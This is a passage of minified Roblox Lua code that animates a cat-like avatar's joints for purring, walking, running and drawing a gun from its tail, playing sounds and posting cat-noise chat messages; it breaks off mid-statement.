wait()TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.98480767,-0.173648626,0,0.173648626,0.98480767),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.300000012,0.700000048,0,-0.640856445,0.640856266,0.42261827,-0.298836231,0.298836172,-0.906307697,-0.707106709,-0.707106888,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.537373543,0.410797119,0.514456749,-0.429610223,-0.797377706,0.423821598,0.859225631,-0.505339205,-0.0797840059,0.27779156,0.329882175,0.902224898),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.413868725,0.029406786,-0.140187263,-0.851848006,-0.495542467,0.169690445,-0.154495448,-0.0718461946,-0.985377789,0.500487924,-0.865607798,-0.015357133),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.531063378,0.474592924,-0.78243959,-0.0379041135,-0.621571779,0.617411792,0.0829073936,-0.782258809,0.0811837018,-0.995836377,-0.0414675511),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(2.1904707e-06,-0.61192739,0.169189453,-1,8.48723403e-09,-1.63108695e-07,2.87404873e-08,-0.4226197,0.906308532,-2.53046608e-07,0.906308353,0.422618985),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(-0.375876427,1.14027405,0.544895172,-0.939692616,2.30967999e-07,-0.342020124,-0.321393877,-0.342020363,0.883022189,-0.116977654,0.939692676,0.321394026),lerpintensity)end;local lo=false;repeat if on=="false"then break end;if lo==false then lo=true;coroutine.resume(coroutine.create(function()local lx={[1]="LOL [Neko]: prrrrrrrrrrrr...",[2]="All"}game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(lx))end))else coroutine.resume(coroutine.create(function()Talk("prrrrrrrrrrrr...")end))end;lerpintensity=0.15;for T=1,30 do wait()if T<=15 then if T==1 then local lJ=math.random(8,13)purring.PlaybackSpeed=lJ/10 end;TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.98480767,-0.173648626,0,0.173648626,0.98480767),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.20000005,0,0,0,1,-0.707106888,0.707106709,0,-0.707106709,-0.707106888,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.700001895,1.50501728e-06,0.799998105,0.178606153,0.383022219,0.906307817,-0.135401472,-0.902787268,0.408217847,0.974559665,-0.195625648,-0.109381542),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,0.126279831,0.0961994305,0.0667652041,0.0560225844,0.99619472,0.76312983,0.640341103,-0.087155737,-0.642787099,0.766044855,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.131063491,0.0745929778,0.0667652115,-0.0560226105,-0.99619472,-0.763129652,0.640341401,-0.0871557593,0.642787337,0.766044736,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,-0.422618657,0.906307638,0,0.906307638,0.422618657),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,1.2688303,0.591665268,-1,0,0,0,-0.422618449,0.906307697,0,0.906307697,0.422618449),lerpintensity)else if T==16 then brushsound:Play()end;TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.98480767,-0.173648626,0,0.173648626,0.98480767),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.20000005,0,0,0,1,-0.707106888,0.707106709,0,-0.707106709,-0.707106888,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.700001895,-0.0999984965,0.699998081,0.178606153,0.383022219,0.906307817,-0.219824702,-0.882301986,0.416197687,0.959050179,-0.273564339,-0.0733867884),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,0.126279831,0.0961994305,0.0667652041,0.0560225844,0.99619472,0.76312983,0.640341103,-0.087155737,-0.642787099,0.766044855,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.131063491,0.0745929778,0.0667652115,-0.0560226105,-0.99619472,-0.763129652,0.640341401,-0.0871557593,0.642787337,0.766044736,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,-0.258819461,0.965925813,0,0.965925813,0.258819461),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,1.2688303,0.591665268,-1,0,0,0,-0.422618449,0.906307697,0,0.906307697,0.422618449),lerpintensity)end end until on=="owo"or on=="false"on="false"repeat if on=="false"then break end;for T=1,30 do wait()if T<=15 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.98480767,-0.173648626,0,0.173648626,0.98480767),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.399999976,0.700000048,0.5,-0.353553444,0.353553355,0.866025388,0.227985561,0.930470407,-0.286788166,-0.907205939,0.0960462689,-0.409576058),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.399998128,0.600001454,0.599998116,-0.351084054,-0.082283318,-0.932721436,-0.316419363,0.947955728,0.0354755521,0.881259918,0.307585865,-0.358848125),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,0.826279819,-0.00380057096,-0.0577223599,0.537662208,0.841182172,-0.755746245,-0.574083865,0.315080076,0.652315617,-0.617533088,0.439473718),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.399999529,0.531062007,-0.0254074335,-0.465810895,-0.352879643,-0.81147778,0.541474938,0.611641765,-0.576800704,0.699874997,-0.708075047,-0.0938339308),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-1.29999352,0.119611315,-1,0,0,0,-0.965925992,-0.258818388,0,-0.258818388,0.965925992),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,1.97360229,-1.11223984,-1,0,0,0,0.819151938,0.57357657,0,0.57357657,-0.819151938),lerpintensity)else if T==16 then brushsound:Play()end;TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.98480767,-0.173648626,0,0.173648626,0.98480767),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.399999976,0.700000048,0.5,-0.353553444,0.353553355,0.866025388,0.227985561,0.930470407,-0.286788166,-0.907205939,0.0960462689,-0.409576058),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.399998128,0.600001454,0.599998116,-0.351084054,-0.082283318,-0.932721436,-0.316419363,0.947955728,0.0354755521,0.881259918,0.307585865,-0.358848125),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,0.826279819,-0.00380057096,-0.0577223599,0.537662208,0.841182172,-0.63099128,-0.672595739,0.386607111,0.773639441,-0.508462787,0.378084034),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.399999529,0.531062007,-0.0254074335,-0.465810895,-0.352879643,-0.81147778,0.478416353,0.671027124,-0.566427648,0.744404435,-0.652072549,-0.143748358),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-1.29999352,0.119611315,-1,0,0,0,-0.984807849,-0.173647508,0,-0.173647508,0.984807849),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,1.97360229,-1.11223984,-1,0,0,0,0.819151938,0.57357657,0,0.57357657,-0.819151938),lerpintensity)end end until on=="false"coroutine.resume(coroutine.create(function()local lx={[1]="IMAO [Neko]: meow~",[2]="All"}game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(lx))end))purring:Stop()on=true;action=false;if walking==true then spawn(WalkAnimation)elseif walking==false then spawn(IdleAnimation)end;Character.Humanoid.WalkSpeed=10;Character.Humanoid.JumpPower=jumppower end;function GunWalkAnimation()lerpintensity=0.15;while true do if walking==false or action==true or GunEquipped==false or running==true then break end;for T=1,20 do wait()if walking==false or action==true or GunEquipped==false or running==true then break end;if T<5 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.953098297,0.221296161,0.206474632,-0.267031431,0.935967088,0.229476914,-0.142471164,-0.273849219,0.951161504),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(-0.199999988,0.500000119,-0.800000012,0,0.087155737,0.99619472,-8.74227766e-08,-0.99619472,0.087155737,1,-8.70901076e-08,7.61939667e-09),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.100001812,0.691286087,0.900381088,0,1,2.98023224e-08,0.0871555507,-2.96889162e-08,0.99619472,0.99619472,2.59743782e-09,-0.0871555507),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,1.10000229,-0.173206329,-0.173648134,0,0.984807551,0.492403775,0.866025448,0.0868240669,-0.852868378,0.5,-0.150383696),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1.05000019,0.0866088867,0.173648134,0,-0.984807551,0.492404044,0.866025329,0.0868241116,0.852868319,-0.500000179,0.150383681),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,1.71363354e-07,1.00000012,0,1.00000012,-1.71363354e-07),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0,0,-0.98480773,-0.173648179,0,0,0,1,-0.173648179,0.98480773,0),lerpintensity)if T==1 then walksound:Play()end elseif T>=5 and T<10 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.953098297,0.221296161,0.206474632,-0.267031431,0.935967088,0.229476914,-0.142471164,-0.273849219,0.951161504),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(-0.199999988,0.500000119,-0.800000012,0,0.087155737,0.99619472,-8.74227766e-08,-0.99619472,0.087155737,1,-8.70901076e-08,7.61939667e-09),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.100001812,0.691286087,0.900381088,0,1,2.98023224e-08,0.0871555507,-2.96889162e-08,0.99619472,0.99619472,2.59743782e-09,-0.0871555507),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,1.10000229,-0.173206329,-0.173648134,0,0.984807551,0.492403775,0.866025448,0.0868240669,-0.852868378,0.5,-0.150383696),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1.05000019,0.0866088867,0.173648134,0,-0.984807551,0.492404044,0.866025329,0.0868241116,0.852868319,-0.500000179,0.150383681),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,1.71363354e-07,1.00000012,0,1.00000012,-1.71363354e-07),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.0999999046,0,-0.98480773,-0.173648179,0,0,0,1,-0.173648179,0.98480773,0),lerpintensity)elseif T>=10 and T<15 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.696813047,0.600698888,-0.391934067,-0.432968378,0.787925243,0.437849402,0.571830273,-0.135404035,0.809120178),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(-0.199999988,0.500000119,-0.800000012,0,0.087155737,0.99619472,-8.74227766e-08,-0.99619472,0.087155737,1,-8.70901076e-08,7.61939667e-09),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.100001812,0.691286087,0.900381088,0,1,2.98023224e-08,0.0871555507,-2.96889162e-08,0.99619472,0.99619472,2.59743782e-09,-0.0871555507),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.499996185,1.19015789,0.129904747,0.173648402,-1.62060473e-07,0.984807253,-0.564862609,0.819151878,0.0996008292,-0.806706905,-0.573576272,0.142244384),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1.15000057,-0.0866012573,-0.173648402,1.54857418e-07,-0.984807372,-0.492403805,0.866025448,0.0868243426,0.852868497,0.499999762,-0.150383979),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,1.71363354e-07,1.00000012,0,1.00000012,-1.71363354e-07),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0,0,-0.98480767,0.173648551,0,0,0,1,0.173648551,0.98480767,0),lerpintensity)if T==10 then walksound:Play()end elseif T>=15 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.696813047,0.600698888,-0.391934067,-0.432968378,0.787925243,0.437849402,0.571830273,-0.135404035,0.809120178),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(-0.199999988,0.500000119,-0.800000012,0,0.087155737,0.99619472,-8.74227766e-08,-0.99619472,0.087155737,1,-8.70901076e-08,7.61939667e-09),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.100001812,0.691286087,0.900381088,0,1,2.98023224e-08,0.0871555507,-2.96889162e-08,0.99619472,0.99619472,2.59743782e-09,-0.0871555507),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.499996185,1.19015789,0.129904747,0.173648402,-1.62060473e-07,0.984807253,-0.564862609,0.819151878,0.0996008292,-0.806706905,-0.573576272,0.142244384),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1.15000057,-0.0866012573,-0.173648402,1.54857418e-07,-0.984807372,-0.492403805,0.866025448,0.0868243426,0.852868497,0.499999762,-0.150383979),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,1.71363354e-07,1.00000012,0,1.00000012,-1.71363354e-07),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.0999999046,0,-0.98480767,0.173648551,0,0,0,1,0.173648551,0.98480767,0),lerpintensity)end end end end;function GunRunAnimation()lr.Trash:WaitForChild("Head").Attachment1.Position=Vector3.new(0,0,0)lr.Trash:WaitForChild("Head").Attachment2.Position=Vector3.new(0,0,-.01)lr.Trash:WaitForChild("Head").Attachment3.Position=Vector3.new(0,0,0)lerpintensity=0.5;if running==true then return end;running=true;while true do if action==true and running==false then stoprunning()running=false;break elseif walking==false then stoprunning()running=false;return end;for T=1,12 do wait()if action==true and running==false then stoprunning()running=false;return elseif walking==false then stoprunning()running=false;return end;if T<3 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.999999881,-0.000320188352,-0.00100398809,0.000969801738,-0.0931002796,0.995656371,-0.000412440335,-0.995656729,-0.0931000262),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.499998093,1.11069322,0.00284767151,0.00104822579,-0.0373455845,0.99930197,-0.769365489,0.638332546,0.0246625859,-0.638807893,-0.768854201,-0.0280633103),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499996185,1.10000134,0,-0.0025613904,0.00549331307,-0.999981642,0.766080141,0.642743289,0.00156857644,0.64274013,-0.766061962,-0.00585465133),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.399996161,0.726279974,0.19619368,-0.570106149,-0.145601541,0.80856663,-0.703167975,-0.422509432,-0.571875095,0.424892604,-0.8945871,0.138492972),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.1847637,0.732380033,0.257478714,-0.633421242,-0.0332981311,-0.773090959,0.734873354,-0.338801771,-0.587516189,-0.242361262,-0.940268636,0.2390742),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.499999762,0,-1,0,0,0,0.965925813,0.258818835,0,0.258818835,-0.965925813),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(-1.90734863e-06,0.690116882,0.826450348,-0.99984777,0,0.0174524188,0.00152107805,-0.99619472,0.0871424824,0.0173860006,0.0871557295,0.996042967),lerpintensity)elseif T>=3 and T<6 then RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.499998093,1.11069322,0.00284767151,0.00104822579,-0.0373455845,0.99930197,-0.99572897,-0.0922928452,-0.00240467861,0.0923182517,-0.995031238,-0.0372828394),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499996185,1.10000134,0,-0.0025613904,0.00549331307,-0.999981642,0.996186376,-0.0871997625,-0.00303071458,-0.0872148126,-0.996175826,-0.00524901412),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.199996173,0.726279974,-0.00380632281,-0.486058295,-0.180515736,0.855080307,-0.80583936,0.471205562,-0.358592451,-0.338186681,-0.863353729,-0.374500334),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.1847637,0.632380009,0.15747872,-0.413873613,0.211198509,-0.885496855,0.714891076,0.677620411,-0.172516018,0.563595235,-0.704433382,-0.43143332),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.499999762,0,-1,0,0,0,0.965925813,0.258818835,0,0.258818835,-0.965925813),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(-1.90734863e-06,0.690116882,0.826450348,-0.99984777,0,0.0174524188,0.00303057628,-0.984807789,0.17362155,0.0171872713,0.17364797,0.984657824),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.999999881,-0.000320188352,-0.00100398809,0.000704634411,-0.505159855,0.863025546,-0.000783653464,-0.863025784,-0.505159497),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)if T==3 then walksound:Play()end elseif T>=6 and T<9 then RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.499998093,1.11069322,0.00284767151,0.00104822591,-0.0373455882,0.99930203,-0.569322526,-0.821562707,-0.0301060043,0.822113454,-0.568893552,-0.0221228637),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499996185,1.10000134,0,-0.0025613904,0.00549331307,-0.999981642,0.573526025,-0.819165647,-0.00596908294,-0.819183469,-0.573530793,-0.00105234119),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.499996185,0.726279974,0.296193689,0.0152609367,0.160046577,0.986992121,-0.0897005647,0.983345449,-0.158068463,-0.995851815,-0.0861214399,0.0293631069),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.484763712,0.632380009,0.257478714,-0.0973621383,-0.221604943,-0.970264375,0.0710586309,0.970860004,-0.228871584,0.99270916,-0.0912289917,-0.0787781402),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.499999762,0,-1,0,0,0,0.965925813,0.258818835,0,0.258818835,-0.965925813),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(-1.90734863e-06,0.690116882,0.826450348,-0.99984777,0,0.0174524188,0.00737570506,-0.906307876,0.422553718,0.0158172604,0.422618091,0.906169891),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.999999881,-0.000320188352,-0.00100398809,0.000557849184,-0.647348344,0.762194097,-0.000894106633,-0.762194157,-0.647347927),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)elseif T>=9 then RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.499998093,1.11069322,0.00284767151,0.00104822579,-0.0373455845,0.99930197,-0.99572897,-0.0922928452,-0.00240467861,0.0923182517,-0.995031238,-0.0372828394),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499996185,1.10000134,0,-0.0025613904,0.00549331307,-0.999981642,0.996186376,-0.0871997625,-0.00303071458,-0.0872148126,-0.996175826,-0.00524901412),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.199996173,0.726279974,-0.00380632281,-0.486058295,-0.180515736,0.855080307,-0.80583936,0.471205562,-0.358592451,-0.338186681,-0.863353729,-0.374500334),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.1847637,0.632380009,0.15747872,-0.413873613,0.211198509,-0.885496855,0.714891076,0.677620411,-0.172516018,0.563595235,-0.704433382,-0.43143332),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.499999762,0,-1,0,0,0,0.965925813,0.258818835,0,0.258818835,-0.965925813),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(-1.90734863e-06,0.690116882,0.826450348,-0.99984777,0,0.0174524188,0.00303057628,-0.984807789,0.17362155,0.0171872713,0.17364797,0.984657824),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.999999881,-0.000320188352,-0.00100398809,0.000704634411,-0.505159855,0.863025546,-0.000783653464,-0.863025784,-0.505159497),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)end end end end;function GunTakeOut()if action==true then return else action=true end;lerpintensity=0.3;Character.Humanoid.WalkSpeed=0;Character.Humanoid.JumpPower=0;if Tail~=nil then end;if GunEquipped==false then local lL=nil;if Tail~=nil then lL=math.random(1,2)else lL=math.random(2,2)end;if lL==1 then for T=1,45 do wait()if T>=1 and T<15 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0.459564209,0.892467499,0.967061996,0.3538284,0.925181389,0.137275308,0.732968211,-0.36545071,0.573762238,0.581001699,-0.102394968,-0.807435691),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(-0.5,0.500000119,0,0,0.087155737,0.99619472,0,0.99619472,-0.087155737,-1,0,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.500001907,0.500000238,0,0,-0.0871557593,-0.99619472,0,0.99619472,-0.0871557593,1,0,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,1,0,0,0,1,0,1,-0,-1,0,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1,0,0,0,-1,0,1,0,1,0,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-0.766044438,0.620885134,0.166365698,-0.321393549,-0.59411478,0.737383127,0.556670487,0.511399388,0.654666781),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0,0,-1,0,0,0,0,1,0,1,-0),lerpintensity)elseif T>=15 and T<30 then if T==15 then Gun.Parent=Tail;cocksound.Parent=Gun;cocksound:Play()GunWeld.Part0=Tail;GunWeld.Part1=Gun;GunWeld.C1=GunWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),1)GunWeld.C0=GunWeld.C0:Lerp(CFrame.new(-0.136752129,0.964542389,2.05783081,-0.118005216,0.918902755,0.3764202,-0.431004584,-0.388897091,0.81424433,0.894600451,-0.0661537051,0.441943228),1)end;RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(-0.500000954,0.499999881,0,0,0.087155737,0.99619478,0,0.99619478,-0.087155737,-1,0,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.500001907,0.500000238,0,0,-0.0871557593,-0.99619472,0,0.99619472,-0.0871557593,1,0,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,1,0,0,0,1,0,1,-0,-1,0,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1,0,0,0,-1,0,1,0,1,0,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-0.766044438,0.620885134,0.166365698,-0.321393549,-0.59411478,0.737383127,0.556670487,0.511399388,0.654666781),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0,0,-1,0,0,0,0,1,0,1,-0),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(-0.0357952118,-0.133686066,0.153659821,-0.156166315,0.978144765,0.137275308,0.817494452,0.0499944985,0.573762238,0.554359674,0.201824218,-0.807435691),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)elseif T>=30 then RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(-0.500011444,0.699986637,2.67028809e-05,-0.115969479,0.31778273,0.941044807,-0.557318985,0.763417304,-0.326480567,-0.822159767,-0.562323868,0.0885732472),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.700001895,1.10000026,0,0.951251209,0.2387826,-0.195202321,0.0950286984,0.375202537,0.92205888,0.29341203,-0.895659447,0.334220678),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,1,0,0,0,1,0,1,-0,-1,0,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1,0,0,0,-1,0,1,0,1,0,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(-3.81469727e-06,-0.499997854,5.7220459e-06,-0.76603961,0.620893061,0.166358367,-0.413185656,-0.673885822,0.612499475,0.49240315,0.400461972,0.772767425),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(-0.000455379486,-9.98973846e-05,0.00012588501,-1.00000155,-1.95503235e-05,-1.08927488e-05,-1.69947743e-05,1.19060287e-05,0.999993205,-1.01029873e-05,0.999999881,-7.64429569e-06),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(-0.0357913971,-0.133386612,0.154045105,0.151821822,0.941880465,0.299685538,0.876633883,-0.268372595,0.399361014,0.456577718,0.202082798,-0.866429031),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)end end else for T=1,45 do wait()if T>=1 and T<15 then if T==1 then masksound:Play()end;RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(-0.5,0.500000119,0,-0.0885213241,-0.411008537,0.907323539,0.243210346,0.874410391,0.41982758,-0.965925813,0.257834166,0.0225575641),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(0.500001907,0.500000238,0,-0.00644042995,0.0771135688,-0.997001529,0.036346633,0.996381342,0.0768309459,0.999318421,-0.035742797,-0.00922000408),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,1,0,0,0,1,0,1,-0,-1,0,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1,0,0,0,-1,0,1,0,1,0,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-0.817427635,0.574380577,0.0435779542,-0.306258202,-0.49742949,0.811646461,0.487870991,0.650116205,0.582521319),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0,0,-1,0,0,0,0,1,0,1,-0),lerpintensity)elseif T>=15 and T<30 then if T==15 then Gun.Parent=Character["Right 